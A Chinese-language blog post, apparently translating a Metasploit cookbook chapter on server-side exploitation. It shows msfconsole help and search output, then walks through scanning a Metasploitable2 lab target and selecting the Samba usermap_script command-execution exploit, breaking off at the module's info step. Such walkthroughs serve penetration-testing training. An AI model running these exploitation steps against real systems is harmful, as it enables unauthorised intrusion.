{"id":491,"date":"2020-08-05T00:25:56","date_gmt":"2020-08-04T16:25:56","guid":{"rendered":"https:\/\/byy3.com\/?p=491"},"modified":"2020-08-05T00:25:56","modified_gmt":"2020-08-04T16:25:56","slug":"metasploit-%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95%e6%89%8b%e5%86%8c%e7%ac%ac%e4%b8%89%e7%89%88-%e7%ac%ac%e4%b8%89%e7%ab%a0-%e6%9c%8d%e5%8a%a1%e7%ab%af%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8-%e5%ae%9e","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=491","title":{"rendered":"Metasploit \u6e17\u900f\u6d4b\u8bd5\u624b\u518c\u7b2c\u4e09\u7248 \u7b2c\u4e09\u7ae0 \u670d\u52a1\u7aef\u6f0f\u6d1e\u5229\u7528 \u5b9e\u4f8b"},"content":{"rendered":"

\u7b2c\u4e09\u7ae0 \u670d\u52a1\u7aef\u6f0f\u6d1e\u5229\u7528<\/h3>\n

\u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u5b66\u4e60\u4ee5\u4e0b\u5185\u5bb9<\/p>\n

1\u3001\u653b\u51fbLinux\u670d\u52a1\u5668<\/p>\n

2\u3001SQL\u6ce8\u5165\u653b\u51fb<\/p>\n

3\u3001shell\u7c7b\u578b<\/p>\n

4\u3001\u653b\u51fbWindows\u670d\u52a1\u5668<\/p>\n

5\u3001\u5229\u7528\u516c\u7528\u670d\u52a1<\/p>\n

6\u3001MS17-010 \u6c38\u6052\u4e4b\u84dd SMB\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cWindows\u5185\u6838\u7834\u574f<\/p>\n

7\u3001MS17-010 EternalRomance\/EternalSynergy\/EternalChampion<\/p>\n

8\u3001\u690d\u5165\u540e\u95e8<\/p>\n

9\u3001\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/p>\n

\u7b80\u4ecb<\/h4>\n

\u5728\u7b2c\u4e8c\u7ae0\u7684\u4fe1\u606f\u6536\u96c6\u548c\u626b\u63cf\u4e2d\uff0c\u6211\u4eec\u6536\u96c6\u4e86\u76ee\u6807\u7684IP\u5730\u5740\uff0c\u7aef\u53e3\uff0c\u670d\u52a1\uff0c\u64cd\u4f5c\u7cfb\u7edf\u7b49\u4fe1\u606f\u3002\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\u6700\u5927\u7684\u6536\u83b7\u662f\u670d\u52a1\u5668\u6216\u7cfb\u7edf\u7684\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u3002\u8fd9\u4e9b\u4fe1\u606f\u5bf9\u540e\u7eed\u7684\u6e17\u900f\u76ee\u6807\u673a\u5668\u975e\u5e38\u6709\u7528\uff0c\u56e0\u4e3a\u6211\u4eec\u53ef\u4ee5\u5feb\u901f\u67e5\u627e\u7cfb\u7edf\u4e0a\u8fd0\u884c\u7684\u670d\u52a1\u548c\u6f0f\u6d1e\u4fe1\u606f\u3002\u8fd9\u4e2a\u8fc7\u7a0b\u6709\u70b9\u590d\u6742\uff0c\u4f46\u662f\u6709\u4e86\u8fd9\u4e9b\u4fe1\u606f\u53ef\u4ee5\u5f88\u5927\u7a0b\u5ea6\u51cf\u8f7b\u6211\u4eec\u540e\u7eed\u7684\u5de5\u4f5c\u3002<\/p>\n

\u6bcf\u4e00\u4e2a\u64cd\u4f5c\u7cfb\u7edf\u90fd\u5b58\u5728\u4e00\u4e9b\u7f3a\u9677\u3002\u4e00\u65e6\u6f0f\u6d1e\u88ab\u62a5\u544a\u51fa\u6765\uff0c\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\u5f00\u53d1\u4e5f\u5f00\u59cb\u4e86\u3002\u83b7\u5f97\u8bb8\u53ef\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u6bd4\u5982Windows\uff0c\u53ef\u4ee5\u5f88\u5feb\u4e3a\u6f0f\u6d1e\u6216BUG\u5f00\u53d1\u8865\u4e01\u7a0b\u5e8f\uff0c\u5e76\u63a8\u9001\u7ed9\u7528\u6237\u66f4\u65b0\u3002\u6f0f\u6d1e\u62ab\u9732\u662f\u4e00\u4e2a\u4e25\u91cd\u7684\u95ee\u9898\uff0c\u7279\u522b\u662f 0day \u6f0f\u6d1e\u4f1a\u5bf9\u8ba1\u7b97\u673a\u884c\u4e1a\u9020\u6210\u4e25\u91cd\u7834\u574f\u30020day \u6536\u5230\u9ad8\u5ea6\u8ffd\u6367\uff0c\u5728\u5e02\u573a\u4e0a\u7684\u4ef7\u683c\u53ef\u8fbe 15000\u7f8e\u5143\u52301000000\u7f8e\u5143\u3002\u6f0f\u6d1e\u88ab\u53d1\u73b0\u5e76\u88ab\u5229\u7528\uff0c\u4f46\u6f0f\u6d1e\u7684\u62ab\u9732\u53d6\u51b3\u4e8e\u7814\u7a76\u4eba\u5458\u53ca\u5176\u610f\u56fe\u3002<\/p>\n

\u50cf\u5fae\u8f6f\u3001\u82f9\u679c\u548c\u8c37\u6b4c\u8fd9\u6837\u7684\u77e5\u540d\u4f01\u4e1a\u4f1a\u5b9a\u671f\u4e3a\u4ed6\u4eec\u7684\u4ea7\u54c1\u53d1\u5e03\u8865\u4e01\uff0c\u56e0\u4e3a\u4ed6\u4eec\u8981\u4e3a\u4f17\u591a\u7684\u7528\u6237\u8d1f\u8d23\u3002\u4f46\u5728\u516c\u53f8\u573a\u666f\u4e2d\uff0c\u60c5\u51b5\u4f1a\u53d8\u5f97\u66f4\u7cdf\uff0c\u7531\u4e8e\u6d89\u53ca\u505c\u673a\u65f6\u95f4\u548c\u786e\u4fdd\u4e1a\u52a1\u8fde\u7eed\u6027\u4e0d\u53d7\u5f71\u54cd\uff0c\u670d\u52a1\u5668\u9700\u8981\u6570\u5468\u624d\u80fd\u4fee\u8865\u3002\u56e0\u6b64\uff0c\u5efa\u8bae\u60a8\u66f4\u65b0\u6216\u5bc6\u5207\u5173\u6ce8\u6b63\u5728\u4f7f\u7528\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u53d1\u73b0\u7684\u4efb\u4f55\u6700\u65b0\u6f0f\u6d1e\u3002\u672a\u4fee\u8865\u7684\u7cfb\u7edf\u662f\u9ed1\u5ba2\u7684\u6700\u7231\uff0c\u56e0\u4e3a\u4ed6\u4eec\u4f1a\u7acb\u5373\u53d1\u52a8\u653b\u51fb\uff0c\u5371\u53ca\u76ee\u6807\u3002\u56e0\u6b64\uff0c\u5fc5\u987b\u5b9a\u671f\u4fee\u8865\u548c\u66f4\u65b0\u64cd\u4f5c\u7cfb\u7edf\u3002\u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u91cd\u70b9\u8ba8\u8bba\u4e00\u4e9b\u6700\u6d41\u884c\u7684\u670d\u52a1\u548c\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u62a5\u544a\u7684\u6f0f\u6d1e\u3002<\/p>\n

\u5728\u6e17\u900f\u6d4b\u8bd5\u7684\u8fc7\u7a0b\u4e2d\uff0c\u4e00\u65e6\u76ee\u6807\u64cd\u4f5c\u7cfb\u7edf\u7684\u4fe1\u606f\u53ef\u7528\uff0c\u6e17\u900f\u4eba\u5458\u5c31\u5f00\u59cb\u5bfb\u627e\u9488\u5bf9\u7279\u5b9a\u670d\u52a1\u6216\u64cd\u4f5c\u7cfb\u7edf\u6f0f\u6d1e\u7684\u53ef\u5229\u7528\u7a0b\u5e8f\u3002\u56e0\u6b64\uff0c\u672c\u7ae0\u5c06\u662f\u6211\u4eec\u6df1\u5165\u4e86\u89e3\u76ee\u6807\u670d\u52a1\u5668\u7aef\u6f0f\u6d1e\u7684\u7b2c\u4e00\u6b65\u3002\u6211\u4eec\u5c06\u91cd\u70b9\u4ecb\u7ecd\u4e00\u4e9b\u4f7f\u7528\u5e7f\u6cdb\u7684windows\u64cd\u4f5c\u7cfb\u7edf\u548cLinux\u64cd\u4f5c\u7cfb\u7edf\u3002\u6211\u4eec\u8fd8\u5c06\u7814\u7a76\u5982\u4f55\u4f7f\u7528\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\uff0c\u5e76\u8bbe\u7f6e\u5b83\u4eec\u7684\u53c2\u6570\uff0c\u4f7f\u5b83\u4eec\u80fd\u591f\u5728\u76ee\u6807\u673a\u5668\u4e0a\u6267\u884c\u3002\u6700\u540e\uff0c\u6211\u4eec\u5c06\u8ba8\u8bba Metasploit \u6846\u67b6\u4e2d\u7684\u653b\u51fb\u8f7d\u8377(payloads)\u3002<\/p>\n

\u5728\u5bf9\u76ee\u6807\u673a\u5668\u653b\u51fb\u5229\u7528\u4e4b\u524d\uff0c\u6211\u4eec\u9996\u5148\u8981\u77e5\u9053\u4e00\u4e9b\u5173\u4e8e\u653b\u51fb\u6a21\u5757\u548c\u653b\u51fb\u8f7d\u8377\u7684\u57fa\u7840\u77e5\u8bc6\uff0c\u6bd4\u5982\u5982\u4f55\u8bbe\u7f6e\u53c2\u6570\u7b49\u3002<\/p>\n

\u4e3a\u4e86\u5bf9\u76ee\u6807\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u653b\u51fb\uff0c\u9996\u5148\u9700\u8981\u626b\u63cf\u76ee\u6807\u7684\u7aef\u53e3\u548c\u670d\u52a1\uff0c\u4e00\u65e6\u6536\u96c6\u4e86\u8db3\u591f\u591a\u7684\u4fe1\u606f\uff0c\u4e0b\u4e00\u6b65\u5c31\u662f\u9009\u62e9\u76f8\u5bf9\u5e94\u7684\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\u5bf9\u76ee\u6807\u8fdb\u884c\u653b\u51fb\u3002\u8ba9\u6211\u4eec\u6765\u5b66\u4e60\u4e00\u4e9b\u00a0msfconsole<\/code>\u4e2d\u7684\u6f0f\u6d1e\u5229\u7528\u547d\u4ee4\u3002<\/p>\n

\u5173\u4e8e\u00a0msfconsole<\/code>\u00a0\u548c\u5982\u4f55\u542f\u52a8\u00a0msfconsole<\/code>\u00a0\uff0c\u5728\u6211\u4eec\u4e4b\u524d\u7684\u7ae0\u8282\u5df2\u7ecf\u8bb2\u89e3\u8fc7\u4e86\u3002<\/p>\n

\u5728msfconsole<\/code>\u00a0\u4e2d\uff0c\u5982\u679c\u8981\u67e5\u770b\u5e2e\u52a9\uff0c\u53ef\u4ee5\u76f4\u63a5\u8f93\u5165\u00a0help<\/code>\u00a0\u547d\u4ee4\u5373\u53ef<\/p>\n

<\/code><\/pre>\n
    \n
  1. \n
    \n
    <\/div>\n<\/div>\n
    \n
    msf5 > help<\/div>\n<\/div>\n<\/li>\n
  2. \n
    \n
    <\/div>\n<\/div>\n
    \n
    <\/div>\n<\/div>\n<\/li>\n
  3. \n
    \n
    <\/div>\n<\/div>\n
    \n
    Core Commands<\/div>\n<\/div>\n<\/li>\n
  4. \n
    \n
    <\/div>\n<\/div>\n
    \n
    =============<\/div>\n<\/div>\n<\/li>\n
  5. \n
    \n
    <\/div>\n<\/div>\n
    \n
    <\/div>\n<\/div>\n<\/li>\n
  6. \n
    \n
    <\/div>\n<\/div>\n
    \n
    Command Description<\/div>\n<\/div>\n<\/li>\n
  7. \n
    \n
    <\/div>\n<\/div>\n
    \n
    ------- -----------<\/div>\n<\/div>\n<\/li>\n
  8. \n
    \n
    <\/div>\n<\/div>\n
    \n
    ? Help menu<\/div>\n<\/div>\n<\/li>\n
  9. \n
    \n
    <\/div>\n<\/div>\n
    \n
    banner Display an awesome metasploit banner<\/div>\n<\/div>\n<\/li>\n
  10. \n
    \n
    <\/div>\n<\/div>\n
    \n
    cd Change the current working directory<\/div>\n<\/div>\n<\/li>\n
  11. \n
    \n
    <\/div>\n<\/div>\n
    \n
    color Toggle color<\/div>\n<\/div>\n<\/li>\n
  12. \n
    \n
    <\/div>\n<\/div>\n
    \n
    connect Communicate with<\/span> a host<\/div>\n<\/div>\n<\/li>\n
  13. \n
    \n
    <\/div>\n<\/div>\n
    \n
    exit<\/span> Exit<\/span> the console<\/div>\n<\/div>\n<\/li>\n
  14. \n
    \n
    <\/div>\n<\/div>\n
    \n
    get Gets the value of<\/span> a context-specific variable<\/div>\n<\/div>\n<\/li>\n
  15. \n
    \n
    <\/div>\n<\/div>\n
    \n
    getg Gets the value of<\/span> a global variable<\/div>\n<\/div>\n<\/li>\n
  16. \n
    \n
    <\/div>\n<\/div>\n
    \n
    grep Grep the output of<\/span> another command<\/div>\n<\/div>\n<\/li>\n
  17. \n
    \n
    <\/div>\n<\/div>\n
    \n
    help Help menu<\/div>\n<\/div>\n<\/li>\n
  18. \n
    \n
    <\/div>\n<\/div>\n
    \n
    history Show command history<\/div>\n<\/div>\n<\/li>\n
  19. \n
    \n
    <\/div>\n<\/div>\n
    \n
    load Load a framework plugin<\/div>\n<\/div>\n<\/li>\n
  20. \n
    \n
    <\/div>\n<\/div>\n
    \n
    quit Exit<\/span> the console<\/div>\n<\/div>\n<\/li>\n
  21. \n
    \n
    <\/div>\n<\/div>\n
    \n
    repeat<\/span> Repeat<\/span> a list of<\/span> commands<\/div>\n<\/div>\n<\/li>\n
  22. \n
    \n
    <\/div>\n<\/div>\n
    \n
    route Route traffic through a session<\/div>\n<\/div>\n<\/li>\n
  23. \n
    \n
    <\/div>\n<\/div>\n
    \n
    save Saves the active datastores<\/div>\n<\/div>\n<\/li>\n
  24. \n
    \n
    <\/div>\n<\/div>\n
    \n
    sessions Dump session listings and<\/span> display information about session<\/div>\n<\/div>\n<\/li>\n
  25. \n
    \n
    <\/div>\n<\/div>\n
    \n
    set<\/span> Sets a context-specific variable to<\/span> a value<\/div>\n<\/div>\n<\/li>\n
  26. \n
    \n
    <\/div>\n<\/div>\n
    \n
    setg Sets a global variable to<\/span> a value<\/div>\n<\/div>\n<\/li>\n
  27. \n
    \n
    <\/div>\n<\/div>\n
    \n
    sleep Do<\/span> nothing for<\/span> the specified number of<\/span> seconds<\/div>\n<\/div>\n<\/li>\n
  28. \n
    \n
    <\/div>\n<\/div>\n
    \n
    spool Write<\/span> console output into a file<\/span> as<\/span> well the screen<\/div>\n<\/div>\n<\/li>\n
  29. \n
    \n
    <\/div>\n<\/div>\n
    \n
    threads View and<\/span> manipulate background threads<\/div>\n<\/div>\n<\/li>\n
  30. \n
    \n
    <\/div>\n<\/div>\n
    \n
    ....<\/div>\n<\/div>\n<\/li>\n
  31. \n
    \n
    <\/div>\n<\/div>\n
    \n
    set<\/span> RHOSTS fe80::3990<\/span>:0000<\/span>\/110<\/span>, ::1<\/span>-::f0f0<\/div>\n<\/div>\n<\/li>\n
  32. \n
    \n
    <\/div>\n<\/div>\n
    \n
    <\/div>\n<\/div>\n<\/li>\n
  33. \n
    \n
    <\/div>\n<\/div>\n
    \n
    Target a block from a resolved domain name<\/span>:<\/div>\n<\/div>\n<\/li>\n
  34. \n
    \n
    <\/div>\n<\/div>\n
    \n
    <\/div>\n<\/div>\n<\/li>\n
  35. \n
    \n
    <\/div>\n<\/div>\n
    \n
    set<\/span> RHOSTS www.example.test\/24<\/span><\/div>\n<\/div>\n<\/li>\n
  36. \n
    \n
    <\/div>\n<\/div>\n
    \n
    msf5 ><\/div>\n<\/div>\n<\/li>\n
  37. \n
    \n
    <\/div>\n<\/div>\n
    \n
    \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
    <\/code><\/pre>\n
    \u4ece\u8f93\u51fa\u7ed3\u679c\u6765\u770b\uff0c\u6709\u8bb8\u591a\u7684\u547d\u4ee4\uff0c\u4f60\u53ef\u80fd\u4f1a\u88ab\u5413\u5230\u3002\u4f46\u4e4b\u524d\u6211\u4eec\u5df2\u7ecf\u4e86\u89e3\u4e86\u4e00\u4e9b\u547d\u4ee4\uff0c\u6bd4\u5982\u6570\u636e\u5e93\u547d\u4ee4\u3002\u73b0\u5728\u6211\u4eec\u5c06\u91cd\u70b9\u5173\u6ce8\u5728\u6f0f\u6d1e\u5229\u7528\u9636\u6bb5\u6700\u6709\u7528\u7684\u547d\u4ee4\uff0c\u5e76\u5728\u8fc7\u7a0b\u4e2d\u4e86\u89e3\u5176\u4ed6\u547d\u4ee4\u3002<\/p>\n
    \u6700\u6709\u7528\u7684\u547d\u4ee4\uff1asearch<\/code>\u547d\u4ee4<\/p>\n
    <\/code><\/pre>\n
      \n
    1. \n
      \n
      <\/div>\n<\/div>\n
      \n
      msf5 > search -h<\/div>\n<\/div>\n<\/li>\n
    2. \n
      \n
      <\/div>\n<\/div>\n
      \n
      Usage:<\/span> search [ options ] <keywords><\/div>\n<\/div>\n<\/li>\n
    3. \n
      \n
      <\/div>\n<\/div>\n
      \n
      <\/div>\n<\/div>\n<\/li>\n
    4. \n
      \n
      <\/div>\n<\/div>\n
      \n
      OPTIONS:<\/span><\/div>\n<\/div>\n<\/li>\n
    5. \n
      \n
      <\/div>\n<\/div>\n
      \n
      -h Show this<\/span> help information<\/div>\n<\/div>\n<\/li>\n
    6. \n
      \n
      <\/div>\n<\/div>\n
      \n
      -o <file> Send output to a file in<\/span> csv format<\/div>\n<\/div>\n<\/li>\n
    7. \n
      \n
      <\/div>\n<\/div>\n
      \n
      -S <string> Search string for<\/span> row filter<\/div>\n<\/div>\n<\/li>\n
    8. \n
      \n
      <\/div>\n<\/div>\n
      \n
      -u Use module if<\/span> there is one result<\/div>\n<\/div>\n<\/li>\n
    9. \n
      \n
      <\/div>\n<\/div>\n
      \n
      <\/div>\n<\/div>\n<\/li>\n
    10. \n
      \n
      <\/div>\n<\/div>\n
      \n
      Keywords:<\/span><\/div>\n<\/div>\n<\/li>\n
    11. \n
      \n
      <\/div>\n<\/div>\n
      \n
      aka :<\/span> Modules with a matching AKA (also-known-as<\/span>) name<\/div>\n<\/div>\n<\/li>\n
    12. \n
      \n
      <\/div>\n<\/div>\n
      \n
      author :<\/span> Modules written by this<\/span> author<\/div>\n<\/div>\n<\/li>\n
    13. \n
      \n
      <\/div>\n<\/div>\n
      \n
      arch :<\/span> Modules affecting this<\/span> architecture<\/div>\n<\/div>\n<\/li>\n
    14. \n
      \n
      <\/div>\n<\/div>\n
      \n
      bid :<\/span> Modules with a matching Bugtraq ID<\/div>\n<\/div>\n<\/li>\n
    15. \n
      \n
      <\/div>\n<\/div>\n
      \n
      cve :<\/span> Modules with a matching CVE ID<\/div>\n<\/div>\n<\/li>\n
    16. \n
      \n
      <\/div>\n<\/div>\n
      \n
      edb :<\/span> Modules with a matching Exploit-DB ID<\/div>\n<\/div>\n<\/li>\n
    17. \n
      \n
      <\/div>\n<\/div>\n
      \n
      check :<\/span> Modules that support the 'check'<\/span> method<\/div>\n<\/div>\n<\/li>\n
    18. \n
      \n
      <\/div>\n<\/div>\n
      \n
      date :<\/span> Modules with a matching disclosure date<\/div>\n<\/div>\n<\/li>\n
    19. \n
      \n
      <\/div>\n<\/div>\n
      \n
      description :<\/span> Modules with a matching description<\/div>\n<\/div>\n<\/li>\n
    20. \n
      \n
      <\/div>\n<\/div>\n
      \n
      full_name :<\/span> Modules with a matching full name<\/div>\n<\/div>\n<\/li>\n
    21. \n
      \n
      <\/div>\n<\/div>\n
      \n
      mod_time :<\/span> Modules with a matching modification date<\/div>\n<\/div>\n<\/li>\n
    22. \n
      \n
      <\/div>\n<\/div>\n
      \n
      name :<\/span> Modules with a matching descriptive name<\/div>\n<\/div>\n<\/li>\n
    23. \n
      \n
      <\/div>\n<\/div>\n
      \n
      path :<\/span> Modules with a matching path<\/div>\n<\/div>\n<\/li>\n
    24. \n
      \n
      <\/div>\n<\/div>\n
      \n
      platform :<\/span> Modules affecting this<\/span> platform<\/div>\n<\/div>\n<\/li>\n
    25. \n
      \n
      <\/div>\n<\/div>\n
      \n
      port :<\/span> Modules with a matching port<\/div>\n<\/div>\n<\/li>\n
    26. \n
      \n
      <\/div>\n<\/div>\n
      \n
      rank :<\/span> Modules with a matching rank (Can be descriptive (ex:<\/span> 'good'<\/span>) or numeric with comparison operators (ex:<\/span> 'gte400'<\/span>))<\/div>\n<\/div>\n<\/li>\n
    27. \n
      \n
      <\/div>\n<\/div>\n
      \n
      ref :<\/span> Modules with a matching ref<\/div>\n<\/div>\n<\/li>\n
    28. \n
      \n
      <\/div>\n<\/div>\n
      \n
      reference :<\/span> Modules with a matching reference<\/div>\n<\/div>\n<\/li>\n
    29. \n
      \n
      <\/div>\n<\/div>\n
      \n
      target :<\/span> Modules affecting this<\/span> target<\/div>\n<\/div>\n<\/li>\n
    30. \n
      \n
      <\/div>\n<\/div>\n
      \n
      type :<\/span> Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)<\/div>\n<\/div>\n<\/li>\n
    31. \n
      \n
      <\/div>\n<\/div>\n
      \n
      <\/div>\n<\/div>\n<\/li>\n
    32. \n
      \n
      <\/div>\n<\/div>\n
      \n
      Examples:<\/span><\/div>\n<\/div>\n<\/li>\n
    33. \n
      \n
      <\/div>\n<\/div>\n
      \n
      search cve:<\/span>2009<\/span> type:<\/span>exploit<\/div>\n<\/div>\n<\/li>\n
    34. \n
      \n
      <\/div>\n<\/div>\n
      \n
      <\/div>\n<\/div>\n<\/li>\n
    35. \n
      \n
      <\/div>\n<\/div>\n
      \n
      msf5 ><\/div>\n<\/div>\n<\/li>\n
    36. \n
      \n
      <\/div>\n<\/div>\n
      \n
      \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
      <\/code><\/pre>\n
      \u901a\u8fc7\u00a0search<\/code>\u6211\u4eec\u53ef\u4ee5\u67e5\u627e\u975e\u5e38\u591a\u7684\u4e1c\u897f\uff0c\u5305\u62ec\u6a21\u5757\uff0c\u6f0f\u6d1e\u7b49\u7b49\u3002<\/p>\n
      1\u3001\u653b\u51fbLinux\u670d\u52a1\u5668<\/h4>\n
      Linux<\/code>\u662f\u4f7f\u7528\u6700\u4e3a\u5e7f\u6cdb\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e4b\u4e00\uff0c\u5728\u524d\u9762\u7684\u7ae0\u8282\u4e2d\uff0c\u6211\u4eec\u5b66\u4e60\u4e86\u5982\u4f55\u626b\u63cf\u53ef\u7528\u670d\u52a1\u548c\u5229\u7528\u6f0f\u6d1e\u626b\u63cf\u5668\u626b\u63cf\u67e5\u627e\u76ee\u6807\u6f0f\u6d1e\u3002\u5728\u672c\u8282\u4e2d\uff0c\u6211\u4eec\u5c06\u4f7f\u7528Metasploitable2<\/code>\u4f5c\u4e3a\u9776\u673a\uff0c\u6211\u4eec\u5c06\u5229\u7528Samba<\/code>\u670d\u52a1\u6f0f\u6d1e\u5bf9Linux<\/code>\u76ee\u6807\u673a\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n
      \u51c6\u5907\u5de5\u4f5c<\/h5>\n
      \u9996\u5148\uff0c\u6211\u4eec\u4f7f\u7528servives<\/code>\u547d\u4ee4\u67e5\u627e\u4e4b\u524dnmap<\/code>\u7684\u626b\u63cf\u7ed3\u679c\uff0c\u5e76\u8fc7\u6ee4139<\/code>\u548c445<\/code>\u7aef\u53e3\u3002<\/p>\n
      <\/code><\/pre>\n
        \n
      1. \n
        \n
        <\/div>\n<\/div>\n
        \n
        msf5<\/span> > services -c port,info<\/span> -p 139<\/span>,445<\/span> 192.168.177.145<\/span><\/div>\n<\/div>\n<\/li>\n
      2. \n
        \n
        <\/div>\n<\/div>\n
        \n
        Services<\/div>\n<\/div>\n<\/li>\n
      3. \n
        \n
        <\/div>\n<\/div>\n
        \n
        ========<\/div>\n<\/div>\n<\/li>\n
      4. \n
        \n
        <\/div>\n<\/div>\n
        \n
        <\/div>\n<\/div>\n<\/li>\n
      5. \n
        \n
        <\/div>\n<\/div>\n
        \n
        host port info<\/span><\/div>\n<\/div>\n<\/li>\n
      6. \n
        \n
        <\/div>\n<\/div>\n
        \n
        ---- ---- ----<\/div>\n<\/div>\n<\/li>\n
      7. \n
        \n
        <\/div>\n<\/div>\n
        \n
        192.168.177.145<\/span> 139<\/span> Samba smbd 3<\/span>.X - 4<\/span>.X workgroup: WORKGROUP<\/div>\n<\/div>\n<\/li>\n
      8. \n
        \n
        <\/div>\n<\/div>\n
        \n
        192.168.177.145<\/span> 445<\/span> Samba smbd 3<\/span>.X - 4<\/span>.X workgroup: WORKGROUP<\/div>\n<\/div>\n<\/li>\n
      9. \n
        \n
        <\/div>\n<\/div>\n
        \n
        <\/div>\n<\/div>\n<\/li>\n
      10. \n
        \n
        <\/div>\n<\/div>\n
        \n
        msf5 ><\/div>\n<\/div>\n<\/li>\n
      11. \n
        \n
        <\/div>\n<\/div>\n
        \n
        \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
        <\/code><\/pre>\n
        \u73b0\u5728\u6211\u4eec\u77e5\u9053\u4e86\u76ee\u6807Samba<\/code>\u7684\u7248\u672c\u4fe1\u606f\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u53bb\u67e5\u627e\u76f8\u5bf9\u5e94\u7684\u6f0f\u6d1e\uff0c\u7136\u540e\u4f7f\u7528search<\/code>\u547d\u4ee4\u641c\u7d22\u53ef\u4f7f\u7528\u7684\u653b\u51fb\u6a21\u5757\u3002<\/p>\n
        TIP\uff1a\u6211\u4eec\u53ef\u4ee5\u5728\u901a\u7528\u6f0f\u6d1e\u62ab\u9732\uff08CVE\uff09\u5728\u7ebf\u5e73\u53f0https:\/\/www.cvedetails.com<\/code>\u4e2d\u627e\u5230\u6709\u5173Samba 3.0.20<\/code>\u6f0f\u6d1e\u7684\u7ec6\u8282\u3002<\/p>\n
        \u901a\u8fc7\u00a0search<\/code>\u547d\u4ee4\u8fc7\u6ee4\u00a0CVE<\/code>\u3001\u6a21\u5757\u7c7b\u578b<\/code>\u3001\u5173\u952e\u5b57<\/code>\u5373\u53ef\u627e\u5230\u53ef\u5229\u7528\u7684\u653b\u51fb\u6a21\u5757\u3002<\/p>\n
        <\/code><\/pre>\n
          \n
        1. \n
          \n
          <\/div>\n<\/div>\n
          \n
          msf5<\/span> ><\/span> search<\/span> cve:2007<\/span> type:exploit<\/span> samba<\/span><\/div>\n<\/div>\n<\/li>\n
        2. \n
          \n
          <\/div>\n<\/div>\n
          \n
          <\/div>\n<\/div>\n<\/li>\n
        3. \n
          \n
          <\/div>\n<\/div>\n
          \n
          Matching<\/span> Modules<\/span><\/div>\n<\/div>\n<\/li>\n
        4. \n
          \n
          <\/div>\n<\/div>\n
          \n
          ================<\/span><\/div>\n<\/div>\n<\/li>\n
        5. \n
          \n
          <\/div>\n<\/div>\n
          \n
          <\/div>\n<\/div>\n<\/li>\n
        6. \n
          \n
          <\/div>\n<\/div>\n
          \n
          # Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n
        7. \n
          \n
          <\/div>\n<\/div>\n
          \n
          -<\/span> ----<\/span> ---------------<\/span> ----<\/span> -----<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
        8. \n
          \n
          <\/div>\n<\/div>\n
          \n
          1<\/span> exploit\/linux\/samba\/lsa_transnames_heap<\/span> 2007-05-14 <\/span>good<\/span> Yes<\/span> Samba<\/span> lsa_io_trans_names<\/span> Heap<\/span> Overflow<\/span><\/div>\n<\/div>\n<\/li>\n
        9. \n
          \n
          <\/div>\n<\/div>\n
          \n
          2<\/span> exploit\/multi\/samba\/usermap_script<\/span> 2007-05-14 <\/span>excellent<\/span> No<\/span> Samba<\/span> \"username map script\"<\/span> Command<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
        10. \n
          \n
          <\/div>\n<\/div>\n
          \n
          3<\/span> exploit\/osx\/samba\/lsa_transnames_heap<\/span> 2007-05-14 <\/span>average<\/span> No<\/span> Samba<\/span> lsa_io_trans_names<\/span> Heap<\/span> Overflow<\/span><\/div>\n<\/div>\n<\/li>\n
        11. \n
          \n
          <\/div>\n<\/div>\n
          \n
          4<\/span> exploit\/solaris\/samba\/lsa_transnames_heap<\/span> 2007-05-14 <\/span>average<\/span> No<\/span> Samba<\/span> lsa_io_trans_names<\/span> Heap<\/span> Overflow<\/span><\/div>\n<\/div>\n<\/li>\n
        12. \n
          \n
          <\/div>\n<\/div>\n
          \n
          <\/div>\n<\/div>\n<\/li>\n
        13. \n
          \n
          <\/div>\n<\/div>\n
          \n
          <\/div>\n<\/div>\n<\/li>\n
        14. \n
          \n
          <\/div>\n<\/div>\n
          \n
          msf5<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
        15. \n
          \n
          <\/div>\n<\/div>\n
          \n
          \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
          <\/code><\/pre>\n
          \u600e\u4e48\u505a<\/h5>\n
          1\u3001\u9009\u62e9\u653b\u51fb\u6a21\u5757<\/p>\n
          <\/code><\/pre>\n
            \n
          1. \n
            \n
            <\/div>\n<\/div>\n
            \n
            msf5 > use exploit\/multi\/<\/span>samba\/usermap_script<\/div>\n<\/div>\n<\/li>\n
          2. \n
            \n
            <\/div>\n<\/div>\n
            \n
            msf5 exploit(multi\/samba\/<\/span>usermap_script) ><\/div>\n<\/div>\n<\/li>\n
          3. \n
            \n
            <\/div>\n<\/div>\n
            \n
            \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
            <\/code><\/pre>\n
            2\u3001\u8fd0\u884cinfo<\/code>\u53ef\u67e5\u770b\u6a21\u5757\u4fe1\u606f<\/p>\n
            <\/code><\/pre>\n
              \n
            1. \n
              \n
              <\/div>\n<\/div>\n
              \n
              msf5<\/span> exploit(multi\/samba\/usermap_script) > info<\/span><\/div>\n<\/div>\n<\/li>\n
            2. \n
              \n
